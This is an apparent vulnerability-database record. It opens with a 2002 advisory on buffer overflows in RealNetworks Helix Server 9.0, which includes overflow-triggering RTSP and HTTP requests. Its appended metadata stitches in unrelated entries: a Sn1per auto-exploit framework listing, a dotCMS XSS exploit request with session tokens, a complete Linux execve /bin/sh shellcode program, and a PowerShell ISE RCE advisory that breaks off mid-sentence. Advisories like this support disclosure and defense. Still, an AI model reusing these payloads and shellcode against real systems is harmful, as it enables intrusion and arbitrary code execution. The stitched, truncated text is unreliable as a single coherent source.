RealNetworks HELIX Server Buffer Overflow Vulnerabilities (#NISR20122002)
2002-12-21T00:00:00
ID SECURITYVULNS:DOC:3907 Type securityvulns Reporter Securityvulns Modified 2002-12-21T00:00:00
Description
NGSSoftware Insight Security Research Advisory
Name: Muliple Buffer overruns RealNetworks Helix Universal Server 9.0
Systems Affected: Windows, FreeBSD, HP-UX, AIX, Linux, Sun Solaris 2.7 &
2.8
Severity: High Risk
Category: Buffer Overrun
Vendor URL: http://www.real.com/
Author: Mark Litchfield (mark@ngssoftware.com)
Date: 20th December 2002
Advisory number: #NISR20122002
Description
According to REAL, the Helix Universal Server is the only universal platform
with support for live and on-demand delivery of all major media file
formats, including Real Media, Windows Media, QuickTime, MPEG 4, MP3, MPEG
2, and more. The Helix server is vulnerable to multiple buffer overrun
vulnerabilities. Previous versions were not tested but it is assumed that
they too may be vulnerable.
Details
The Helix server uses the RTSP protocol, which is based upon HTTP.
Vulnerability One: By supplying an overly long character string within the
Transport field of a SETUP RSTP request to a Helix server, which by default
listens on TCP port 554, an overflow will occur overwriting the saved return
address on the stack. On a windows box, the Helix server is installed by
default as a system service and so exploitation of this vulnerability would
result in a complete server compromise, with supplied code executing in the
security context of SYSTEM. The impact of these vulnerabilities on UNIX
based platforms was not tested, though they are vulnerable.
Vulnerability Two: By supplying a very long URL in the Describe field,
again over port 554, an attacker can overwrite the saved return address
allowing the execution of code
Vulnerability Three: By making two HTTP requests (port 80) containing long
URI's simultaneously, (in making the first connection, it will appear to
hang, by keeping this session open and making another connection and
supplying the same request again ), will cause the saved return address to
also be overwritten, allowing an attacker to run arbitrary code of their
choosing.
GET /SmpDsBhgRl3a685b91-442d-4a15-b4b7-566353f4178fAAAAAA--> HTTP/1.0
User-Agent: RealPlayer G2
Expires: Mon, 18 May 1974 00:00:00 GMT
Pragma: no-cache
Accept: application/x-rtsp-tunnelled, /
ClientID: WinNT_5.2_6.0.11.818_RealPlayer_R1P04D_en-us_UNK
Cookie:
cbid=dfjgimiidjcfllgheokrqprqqojrptnpikcjkioigjdkfiplqniomprtkronoqmuekigihd
i
X-Actual-URL: rtsp://www.ngssoftware.com/nosuchfile.rt
Fix Information
NGSSoftware alerted REALNetworks to theses issues on 8/11/2002, 30/11/2002,
12/11/2002 respectively.
A patch has now been made available from
http://www.service.real.com/help/faq/security/bufferoverrun12192002.html
A check for these issues has been added to Typhon III, of which more
information is available from the
NGSSoftware website, http://www.ngssoftware.com.
Further Information
For further information about the scope and effects of buffer overflows,
please see
NGSSoftware design, research and develop intelligent, advanced application
security assessment scanners. Based in the United Kingdom, NGSSoftware have
offices in the South of London and the East Coast of Scotland. NGSSoftware's
sister company NGSConsulting, offers best of breed security consulting
services, specialising in application, host and network security
assessments.
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
Delivery co-sponsored by Prometric - More than testing, learning.
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
http://www.prometric.com
Prometric, part of The Thomson Corporation, is the leader in
technology-enabled testing and assessment services for information
technology certification, academic admissions, professional licensure and
certifications, computer-based driver's licensing, and corporate testing.
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
{"id": "SECURITYVULNS:DOC:3907", "bulletinFamily": "software", "title": "RealNetworks HELIX Server Buffer Overflow Vulnerabilities (#NISR20122002)", "description": "NGSSoftware Insight Security Research Advisory\r\n\r\nName: Muliple Buffer overruns RealNetworks Helix Universal Server 9.0\r\nSystems Affected: Windows, FreeBSD, HP-UX, AIX, Linux, Sun Solaris 2.7 &\r\n2.8\r\nSeverity: High Risk\r\nCategory: Buffer Overrun\r\nVendor URL: http://www.real.com/\r\nAuthor: Mark Litchfield (mark@ngssoftware.com)\r\nDate: 20th December 2002\r\nAdvisory number: #NISR20122002\r\n\r\n\r\nDescription\r\n***********\r\nAccording to REAL, the Helix Universal Server is the only universal platform\r\nwith support for live and on-demand delivery of all major media file\r\nformats, including Real Media, Windows Media, QuickTime, MPEG 4, MP3, MPEG\r\n2, and more. The Helix server is vulnerable to multiple buffer overrun\r\nvulnerabilities. Previous versions were not tested but it is assumed that\r\nthey too may be vulnerable.\r\n\r\nDetails\r\n*******\r\nThe Helix server uses the RTSP protocol, which is based upon HTTP.\r\n\r\nVulnerability One: By supplying an overly long character string within the\r\nTransport field of a SETUP RSTP request to a Helix server, which by default\r\nlistens on TCP port 554, an overflow will occur overwriting the saved return\r\naddress on the stack. On a windows box, the Helix server is installed by\r\ndefault as a system service and so exploitation of this vulnerability would\r\nresult in a complete server compromise, with supplied code executing in the\r\nsecurity context of SYSTEM. The impact of these vulnerabilities on UNIX\r\nbased platforms was not tested, though they are vulnerable.\r\n\r\nSETUP rtsp://www.ngsconsulting.com:554/real9video.rm RTSP/1.0\r\nCSeq: 302\r\nTransport: AAAAAAAAA-->\r\n\r\nVulnerability Two: By supplying a very long URL in the Describe field,\r\nagain over port 554, an attacker can overwrite the saved return address\r\nallowing the execution of code\r\n\r\nDESCRIBE rtsp://www.ngsconsulting.com:554/AAAAAAAA-->.smi RTSP/1.0\r\nCSeq: 2\r\nAccept: application/sdp\r\nSession: 4668-1\r\nBandwidth: 393216\r\nClientID: WinNT_5.2_6.0.11.818_RealPlayer_R1P04D_en-us_UNK\r\nCookie: cbid=www.ngsconsulting.com\r\nGUID: 00000000-0000-0000-0000-000000000000\r\nLanguage: en-us\r\nPlayerCookie: cbid\r\nRegionData: myregion\r\nRequire: com.real.retain-entity-for-setup\r\nSupportsMaximumASMBandwidth: 1\r\n\r\nVulnerability Three: By making two HTTP requests (port 80) containing long\r\nURI's simultaneously, (in making the first connection, it will appear to\r\nhang, by keeping this session open and making another connection and\r\nsupplying the same request again ), will cause the saved return address to\r\nalso be overwritten, allowing an attacker to run arbitrary code of their\r\nchoosing.\r\n\r\nGET /SmpDsBhgRl3a685b91-442d-4a15-b4b7-566353f4178fAAAAAA--> HTTP/1.0\r\nUser-Agent: RealPlayer G2\r\nExpires: Mon, 18 May 1974 00:00:00 GMT\r\nPragma: no-cache\r\nAccept: application/x-rtsp-tunnelled, */*\r\nClientID: WinNT_5.2_6.0.11.818_RealPlayer_R1P04D_en-us_UNK\r\nCookie:\r\ncbid=dfjgimiidjcfllgheokrqprqqojrptnpikcjkioigjdkfiplqniomprtkronoqmuekigihd\r\ni\r\nX-Actual-URL: rtsp://www.ngssoftware.com/nosuchfile.rt\r\n\r\nFix Information\r\n***************\r\nNGSSoftware alerted REALNetworks to theses issues on 8/11/2002, 30/11/2002,\r\n12/11/2002 respectively.\r\nA patch has now been made available from\r\nhttp://www.service.real.com/help/faq/security/bufferoverrun12192002.html\r\n\r\nA check for these issues has been added to Typhon III, of which more\r\ninformation is available from the\r\nNGSSoftware website, http://www.ngssoftware.com.\r\n\r\nFurther Information\r\n*******************\r\nFor further information about the scope and effects of buffer overflows,\r\nplease see\r\n\r\nhttp://www.ngssoftware.com/papers/non-stack-bo-windows.pdf\r\nhttp://www.ngssoftware.com/papers/ntbufferoverflow.html\r\nhttp://www.ngssoftware.com/papers/bufferoverflowpaper.rtf\r\nhttp://www.ngssoftware.com/papers/unicodebo.pdf\r\n\r\n\r\nAbout NGSSoftware\r\n*****************\r\nNGSSoftware design, research and develop intelligent, advanced application\r\nsecurity assessment scanners. Based in the United Kingdom, NGSSoftware have\r\noffices in the South of London and the East Coast of Scotland. NGSSoftware's\r\nsister company NGSConsulting, offers best of breed security consulting\r\nservices, specialising in application, host and network security\r\nassessments.\r\n\r\nhttp://www.ngssoftware.com/\r\nhttp://www.ngsconsulting.com/\r\n\r\nTelephone +44 208 401 0070\r\nFax +44 208 401 0076\r\n\r\nenquiries@ngssoftware.com\r\n\r\noooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\r\nDelivery co-sponsored by Prometric - More than testing, learning.\r\noooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\r\nhttp://www.prometric.com\r\n\r\nPrometric, part of The Thomson Corporation, is the leader in\r\ntechnology-enabled testing and assessment services for information\r\ntechnology certification, academic admissions, professional licensure and\r\ncertifications, computer-based driver's licensing, and corporate testing.\r\noooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo", "published": "2002-12-21T00:00:00", "modified": "2002-12-21T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:3907", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:06", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "cb6ee7ae34ac640038c7a5c39913c559"}, {"key": "href", "hash": "d7664c6add5c23842159f19f1335f69a"}, {"key": "modified", "hash": "c6f17c4bcd8ae05374af74c8ece452df"}, {"key": "published", "hash": "c6f17c4bcd8ae05374af74c8ece452df"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "a49ebb2e1a771348dfa0039e0d589df6"}, {"key": "title", "hash": "d91653b093be4b869ec8e08e2fe0dea4"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "7bd0d2f34d0cfb2a8a12519b20d7d9004ebf57bffb1d1e68bedf3f7ce32242b9", "viewCount": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2018-08-31T11:10:06"}, "dependencies": {"references": [{"type": "ics", "idList": ["ICSA-19-031-02"]}, {"type": "cve", "idList": ["CVE-2019-3907", "CVE-2018-3907"]}, {"type": "threatpost", "idList": ["THREATPOST:8F70136968C47CF254CBE5D623B683C5"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2016-1840.NASL", "PHOTONOS_PHSA-2016-0013.NASL", "PHOTONOS_PHSA-2017-0040.NASL", "F5_BIGIP_SOL16845.NASL", "SUSE_SU-2018-2275-1.NASL", "OPENSUSE-2018-846.NASL", "OPENSUSE-2018-809.NASL", "SUSE_SU-2018-2145-1.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:149050", "PACKETSTORM:148811"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2018:2287-1", "OPENSUSE-SU-2018:2212-1"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310851850"]}, {"type": "zdt", "idList": ["1337DAY-ID-30839", "1337DAY-ID-30805"]}, {"type": "exploitdb", "idList": ["EDB-ID:45149"]}], "modified": "2018-08-31T11:10:06"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "affectedSoftware": []}
{"kitploit": [{"lastseen": "2019-05-12T18:14:06", "bulletinFamily": "tools", "description": "[  ](<https://1.bp.blogspot.com/-Poffj1hNPBk/XNXfkZuyGfI/AAAAAAAAO0U/k4nQgdLXOoEZMOGlGb3wgnx8HgQzEtacgCLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>)\n\n \n\n\nSn1per Community Edition is an [ automated scanner ](<https://www.kitploit.com/search/label/Automated%20scanner> \"automated scanner\" ) that can be used during a [ penetration test ](<https://www.kitploit.com/search/label/Penetration%20Test> \"penetration test\" ) to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes. For more information regarding Sn1per Professional, go to [ https://xerosecurity.com ](<https://xerosecurity.com/> \"https://xerosecurity.com\" ) . \n\n \n** SN1PER PROFESSIONAL FEATURES: ** \n \n** Professional reporting interface ** \n \n\n\n[  ](<https://2.bp.blogspot.com/-HnwS8O0KEik/XNXfrGJWPeI/AAAAAAAAO0Y/94Hl4CC3M_kytYKkKldzXNviz4ff92TVACLcBGAs/s1600/Sn1per_8.png>)\n\n \n** Slideshow for all gathered screenshots ** \n \n\n\n[  ](<https://2.bp.blogspot.com/-coOpsZX0XMM/XNXfuVNicUI/AAAAAAAAO0c/Wd2EQSAcI4Uti3bkaa1kxqajpStfjTK0ACLcBGAs/s1600/Sn1per_9.png>)\n\n \n** Searchable and sortable DNS, IP and open port database ** \n \n\n\n[  ](<https://4.bp.blogspot.com/-bfzb6vLbCks/XNXfy5vfkTI/AAAAAAAAO0g/9aO7_9YKrqMyWK3PehtfItlm4DZ6KWR4gCLcBGAs/s1600/Sn1per_10.png>)\n\n \n** Detailed host reports ** \n \n\n\n[  ](<https://4.bp.blogspot.com/-JbxR5Z-2O_4/XNXf2YbT_DI/AAAAAAAAO0o/w8Hin6Cbf1Ue4QbVW70T2-r1Rj82wDsSQCLcBGAs/s1600/Sn1per_11.png>)\n\n \n** NMap HTML host reports ** \n \n\n\n[  ](<https://2.bp.blogspot.com/-TYr4tFOy7Y4/XNXf7dXeSII/AAAAAAAAO0w/0YMKst5KHGoygojHG2r6tJxqkg2a-w1YQCLcBGAs/s1600/Sn1per_12.png>)\n\n \n** Quick links to online recon tools and Google hacking queries ** \n \n\n\n[  ](<https://1.bp.blogspot.com/-FNe1YF5mg68/XNXgAPQOAEI/AAAAAAAAO00/5uuuQo2KqRgwpTE11Z-U6p_XGetjCf9vgCLcBGAs/s1600/Sn1per_13.png>)\n\n \n** Takeovers and Email Security ** \n \n\n\n[  ](<https://2.bp.blogspot.com/-FNah2OwM_nU/XNXgEeJZG9I/AAAAAAAAO08/A7lu1554nJ0GpEOj7AtdZ_emSoyq5lBxQCLcBGAs/s1600/Sn1per_14.png>)\n\n \n** HTML5 Notepad ** \n \n\n\n[  ](<https://2.bp.blogspot.com/-DHOnECOz-T0/XNXgH_QX4JI/AAAAAAAAO1E/s0bFVC-Uf_87tBFY2AJwiJyHgKJ8VgKXQCLcBGAs/s1600/Sn1per_15.png>)\n\n \n** ORDER SN1PER PROFESSIONAL: ** \nTo obtain a Sn1per Professional license, go to [ https://xerosecurity.com ](<https://xerosecurity.com/> \"https://xerosecurity.com\" ) . \n \n** DEMO VIDEO: ** \n \n \n\n\n[  ](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>)\n\n \n \n** SN1PER COMMUNITY FEATURES: ** \n\n\n * Automatically collects basic recon (ie. whois, ping, DNS, etc.) \n * Automatically launches Google hacking queries against a target domain \n * Automatically enumerates open ports via NMap port scanning \n * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers \n * Automatically checks for sub-domain hijacking \n * Automatically runs targeted NMap scripts against open ports \n * Automatically runs targeted Metasploit scan and exploit modules \n * Automatically scans all web applications for common vulnerabilities \n * Automatically brute forces ALL open services \n * Automatically test for anonymous FTP access \n * Automatically runs WPScan, Arachni and Nikto for all web services \n * Automatically enumerates NFS shares \n * Automatically test for anonymous LDAP access \n * Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities \n * Automatically enumerate SNMP community strings, services and users \n * Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067 \n * Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers \n * Automatically tests for open X11 servers \n * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds \n * Performs high level enumeration of multiple hosts and subnets \n * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting \n * Automatically gathers screenshots of all web sites \n * Create individual workspaces to store all scan output \n \n** EXPLOITS: ** \n\n\n * Drupal RESTful Web Services unserialize() SA-CORE-2019-003 \n * Apache Struts: S2-057 (CVE-2018-11776): Security updates available for Apache Struts \n * Drupal: CVE-2018-7600: [ Remote Code Execution ](<https://www.kitploit.com/search/label/Remote%20Code%20Execution> \"Remote Code Execution\" ) \\- SA-CORE-2018-002 \n * GPON Routers - Authentication Bypass / [ Command Injection ](<https://www.kitploit.com/search/label/Command%20Injection> \"Command Injection\" ) CVE-2018-10561 \n * MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption \n * Apache Tomcat: Remote Code Execution (CVE-2017-12617) \n * Oracle WebLogic wls-wsat Component Deserialization Remote Code Execution CVE-2017-10271 \n * Apache Struts Content-Type arbitrary command execution (CVE-2017-5638) \n * Apache Struts 2 Framework Checks - REST plugin with XStream handler (CVE-2017-9805) \n * Apache Struts Content-Type arbitrary command execution (CVE-2017-5638) \n * Microsoft IIS WebDav ScStoragePathFromUrl Overflow CVE-2017-7269 \n * ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability CVE-2015-8249 \n * Shellshock Bash Shell remote code execution CVE-2014-6271 \n * HeartBleed OpenSSL Detection CVE-2014-0160 \n * MS12-020: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution (2671387) \n * Tomcat Application Manager Default Ovwebusr Password Vulnerability CVE-2009-3843 \n * MS08-067 Microsoft Server Service Relative Path Stack Corruption \n * Webmin File Disclosure CVE-2006-3392 \n * VsFTPd 2.3.4 Backdoor \n * ProFTPd 1.3.3C Backdoor \n * MS03-026 Microsoft RPC DCOM Interface Overflow \n * DistCC Daemon Command Execution \n * JBoss Java De-Serialization \n * HTTP Writable Path PUT/DELETE File Access \n * Apache Tomcat User Enumeration \n * Tomcat Application Manager Login Bruteforce \n * Jenkins-CI Enumeration \n * HTTP WebDAV Scanner \n * Android Insecure ADB \n * Anonymous FTP Access \n * PHPMyAdmin Backdoor \n * PHPMyAdmin Auth Bypass \n * OpenSSH User Enumeration \n * LibSSH Auth Bypass \n * SMTP User Enumeration \n * Public NFS Mounts \n \n** KALI LINUX INSTALL: ** \n\n \n \n bash install.sh\n\n \n** UBUNTU/DEBIAN/PARROT INSTALL: ** \n\n \n \n bash install_debian_ubuntu.sh\n\n \n** DOCKER INSTALL: ** \n\n \n \n docker build Dockerfile\n\n \n** USAGE: ** \n\n \n \n [*] NORMAL MODE\n sniper -t|--target <TARGET>\n \n [*] NORMAL MODE + OSINT + RECON + FULL PORT SCAN + BRUTE FORCE\n sniper -t|--target <TARGET> -o|--osint -re|--recon -fp|--fullportonly -b|--bruteforce\n \n [*] STEALTH MODE + OSINT + RECON\n sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon\n \n [*] DISCOVER MODE\n sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORSPACE_ALIAS>\n \n [*] FLYOVER MODE\n sniper -t|--target <TARGET> -m|--mode flyover -w|--workspace <WORKSPACE_ALIAS>\n \n [*] AIRSTRIKE MODE\n sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike\n \n [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED\n sniper -f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>\n \n [*] SCAN ONLY SPECIFIC PORT\n sniper -t|--target <TA RGET> -m port -p|--port <portnum>\n \n [*] FULLPORTONLY SCAN MODE\n sniper -t|--target <TARGET> -fp|--fullportonly\n \n [*] PORT SCAN MODE\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] WEB MODE - PORT 80 + 443 ONLY!\n sniper -t|--target <TARGET> -m|--mode web\n \n [*] HTTP WEB PORT HTTP MODE\n sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>\n \n [*] HTTPS WEB PORT HTTPS MODE\n sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>\n \n [*] WEBSCAN MODE\n sniper -t|--target <TARGET> -m|--mode webscan\n \n [*] ENABLE BRUTEFORCE\n sniper -t|--target <TARGET> -b|--bruteforce\n \n [*] ENABLE LOOT IMPORTING INTO METASPLOIT\n sniper -t|--target <TARGET>\n \n [*] LOOT REIMPORT FUNCTION\n sniper -w <WORKSPACE_ALIAS> --reimport\n \n [*] LOOT REIMPORTALL FUNCTION\n sniper -w <WORKSPACE_ALIAS& gt; --reimportall\n \n [*] DELETE WORKSPACE\n sniper -w <WORKSPACE_ALIAS> -d\n \n [*] DELETE HOST FROM WORKSPACE\n sniper -w <WORKSPACE_ALIAS> -t <TARGET> -dh\n \n [*] SCHEDULED SCANS'\n sniper -w <WORKSPACE_ALIAS> -s daily|weekly|monthly'\n \n [*] SCAN STATUS\n sniper --status\n \n [*] UPDATE SNIPER\n sniper -u|--update\n\n \n** MODES: ** \n\n\n * ** NORMAL: ** Performs basic scan of targets and open ports using both active and passive checks for optimal performance. \n * ** STEALTH: ** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking. \n * ** FLYOVER: ** Fast multi-threaded high level scans of multiple targets (useful for collecting high level data on many hosts quickly). \n * ** AIRSTRIKE: ** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning. \n * ** NUKE: ** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke. \n * ** DISCOVER: ** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans. \n * ** PORT: ** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode. \n * ** FULLPORTONLY: ** Performs a full detailed port scan and saves results to XML. \n * ** WEB: ** Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly. \n * ** WEBPORTHTTP: ** Launches a full HTTP web application scan against a specific host and port. \n * ** WEBPORTHTTPS: ** Launches a full HTTPS web application scan against a specific host and port. \n * ** WEBSCAN: ** Launches a full HTTP & HTTPS web application scan against via Burpsuite and Arachni. \n \n** SAMPLE REPORT: ** \n[ https://gist.github.com/1N3/8214ec2da2c91691bcbc ](<https://gist.github.com/1N3/8214ec2da2c91691bcbc> \"https://gist.github.com/1N3/8214ec2da2c91691bcbc\" ) \n \n \n\n\n** [ Download Sn1per ](<https://github.com/1N3/Sn1per> \"Download Sn1per\" ) **\n", "modified": "2019-05-12T13:09:05", "published": "2019-05-12T13:09:05", "id": "KITPLOIT:7013881512724945934", "href": "http://www.kitploit.com/2019/05/sn1per-v70-automated-pentest-framework.html", "title": "Sn1per v7.0 - Automated Pentest Framework For Offensive Security Experts", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2019-05-16T01:56:45", "bulletinFamily": "exploit", "description": "Exploit for jsp platform in category web applications", "modified": "2019-05-10T00:00:00", "published": "2019-05-10T00:00:00", "id": "1337DAY-ID-32699", "href": "https://0day.today/exploit/description/32699", "title": "dotCMS 5.1.1 - HTML Injection Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: dotCMS 5.1.1 - HTML Injection \r\n# Exploit Author: Ismail Tasdelen\r\n# Vendor Homepage: https://dotcms.com/\r\n# Software Link: https://github.com/dotCMS\r\n# Software: dotCMS\r\n# Product Version: 5.1.1\r\n# Vulernability Type: Code Injection\r\n# Vulenrability: HTML Injection and Cross-site Scripting\r\n# CVE: CVE-2019-11846\r\n\r\n# HTTP POST Request :\r\n\r\nPOST /servlets/ajax_file_upload?fieldName=binary3 HTTP/1.1\r\nHost: TARGET\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: https://TARGET/c/portal/layout?p_l_id=b7ab5d3c-5ee0-4195-a17e-8f5579d718dd&p_p_id=site-browser&p_p_action=1&p_p_state=maximized&angularCurrentPortlet=site-browser&p_p_mode=view&_site_browser_struts_action=%2Fext%2Fcontentlet%2Fedit_contentlet&_site_browser_cmd=new&selectedStructure=33888b6f-7a8e-4069-b1b6-5c1aa9d0a48d&folder=SYSTEM_FOLDER&referer=/c/portal/layout%3Fp_l_id%3Db7ab5d3c-5ee0-4195-a17e-8f5579d718dd%26p_p_id%3Dsite-browser%26p_p_action%3D0%26p_p_state%3Dmaximized%26angularCurrentPortlet%3Dsite-browser%26p_p_mode%3Dview%26_site_browser_struts_action%3D%252Fext%252Fbrowser%252Fview_browser&in_frame=true&frame=detailFrame&container=true&angularCurrentPortlet=site-browser\r\nContent-Type: multipart/form-data; boundary=---------------------------5890268631313811380287956669\r\nContent-Length: 101313\r\nDNT: 1\r\nConnection: close\r\nCookie: messagesUtk=2366e7c3b5af4c8c93bb11d0c994848a; BACKENDID=172.18.0.3; JSESSIONID=65C16EFBEE5B7176B22083A0CA451F0A.c16f6b7d05d9; hs-messages-hide-welcome-message=true; access_token=eyJhbGciOiJIUzI1NiJ9.eyJqdGkiOiJkZGFlZmEzNS0yYmMyLTQ4MTEtOTRjNi0xNGE0OTk4YzFkNDAiLCJpYXQiOjE1NTczOTY0NzYsInVwZGF0ZWRfYXQiOjEyMDQ4MjQ5NjEwMDAsInN1YiI6ImRvdGNtcy5vcmcuMSIsImlzcyI6IjRiNTkyYjIyLTBiMmEtNGI2ZC05NmU4LTdjMzBiMzgzOTM1ZiJ9.F8_L_Cu96pkYcwTl4ex_zfrA-Fk-rqNUz24oCV0gOmc; DWRSESSIONID=EZToDkzmi*mMXCayMxskFA75sGm\r\nUpgrade-Insecure-Requests: 1\r\n\r\n-----------------------------5890268631313811380287956669\r\nContent-Disposition: form-data; name=\"binary3FileUpload\"; filename=\"\\\"><img src=x onerror=alert(\\\"ismailtasdelen\\\")> .json\"\r\nContent-Type: application/json\r\n\r\n# HTTP Response :\r\n\r\nHTTP/1.1 200 \r\nContent-Length: 0\r\nDate: Thu, 09 May 2019 10:23:44 GMT\r\nConnection: close\n\n# 0day.today [2019-05-16] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32699"}, {"lastseen": "2019-05-16T01:57:23", "bulletinFamily": "exploit", "description": "Exploit for linux/x86 platform in category shellcode", "modified": "2019-05-08T00:00:00", "published": "2019-05-08T00:00:00", "id": "1337DAY-ID-32713", "href": "https://0day.today/exploit/description/32713", "title": "Linux/x86 - execve /bin/sh Shellcode (20 bytes)", "type": "zdt", "sourceData": "/*\r\n# Linux/x86 - execve /bin/sh shellcode (20 bytes)\r\n# Author: Rajvardhan\r\n# Tested on: i686 GNU/Linux\r\n# Shellcode Length: 20\r\n\r\nDisassembly of section .text:\r\n\r\n08049000 <.text>:\r\n 8049000: 31 c9 xor %ecx,%ecx\r\n 8049002: 6a 0b push $0xb\r\n 8049004: 58 pop %eax\r\n 8049005: 51 push %ecx\r\n 8049006: 68 2f 2f 73 68 push $0x68732f2f\r\n 804900b: 68 2f 62 69 6e push $0x6e69622f\r\n 8049010: 89 e3 mov %esp,%ebx\r\n 8049012: cd 80 int $0x80\r\n\r\n===============poc by Rajvardhan=========================\r\n*/\r\n\r\n#include<stdio.h>\r\n#include<string.h>\r\n\r\nunsigned char shellcode[] = \"\\x31\\xc9\\x6a\\x0b\\x58\\x51\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\xcd\\x80\";\r\nmain()\r\n{\r\nprintf(\"Shellcode Length: %d\\n\", strlen(shellcode));\r\nint (*ret)() = (int(*)())shellcode;\r\nret();\r\n}\n\n# 0day.today [2019-05-16] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32713"}, {"lastseen": "2019-05-03T01:50:33", "bulletinFamily": "exploit", "description": "Microsoft Windows PowerShell ISE will execute wrongly supplied code when debugging specially crafted PowerShell scripts that contain array brackets as part of the filename. This can result in ISE executing attacker supplied scripts pointed to by the filename and not the \"trusted\" PS file currently loaded and being viewed by a user in the host application. This undermines the integrity of PowerShell ISE allowing potential unexpected remote code execution.", "modified": "2019-05-03T00:00:00", "published": "2019-05-03T00:00:00", "id": "1337DAY-ID-32642", "href": "https://0day.today/exploit/description/32642", "title": "Windows #PowerShell ISE / Filename Parsing Flaw Remote Code Execution Exploit #RCE", "type": "zdt", "sourceData": "Windows PowerShell ISE / Filename Parsing Flaw Remote Code Execution Exploit\r\n\r\n[+] Credits: John Page (aka hyp3rlinx) \r\n[+] Website: hyp3rlinx.altervista.org\r\n[+] Source: http://hyp3rlinx.altervista.org/advisories/WINDOWS-POWERSHELL-ISE-FILENAME-PARSING-FLAW-RCE-0DAY.txt \r\n\r\n\r\n[Vendor]\r\nwww.microsoft.com\r\n\r\n\r\n[Product]\r\nWindows PowerShell ISE\r\n\r\nThe Windows PowerShell Integrated Scripting Environment (ISE) is a host application for Windows PowerShell.\r\nIn the ISE, you can run commands and write, test, and debug scripts in a single Windows-based graphic user interface.\r\n\r\n\r\n[Vulnerability Type]\r\nFilename Parsing Flaw Remote Code Execution 0day\r\n\r\n\r\n[References]\r\nZDI-CAN-8005\r\n\r\n\r\n[Security Issue]\r\nWindows PowerShell ISE will execute wrongly supplied code when debugging specially crafted PowerShell scripts that contain\r\narray brackets as part of the filename. This can result in ISE executing attacker supplied scripts pointed to by the filename\r\nand not the \"trusted\" PS file currently loaded and being viewed by a user in the host application. This undermines the integrity of\r\nPowerShell ISE allowing potential unexpected remote code execution.\r\n\r\nIn PowerShell brackets are used to access array elements.\r\n\r\nPS C:\\> $a=1..10\r\nPS C:\\> $a[4]\r\n5\r\n\r\nHowever, when brackets are used as part of the filename it can be used to hijack the currently loaded file in place of another malicious file.\r\nThat file must contain a single matching char value which is also found in our specially crafted filename.\r\n\r\nRequirements are both files must reside in the same directory. Example, if a file named [HelloWorldTutoria1].ps1 resides alongside a\r\nfile named 1.ps1 it will create a 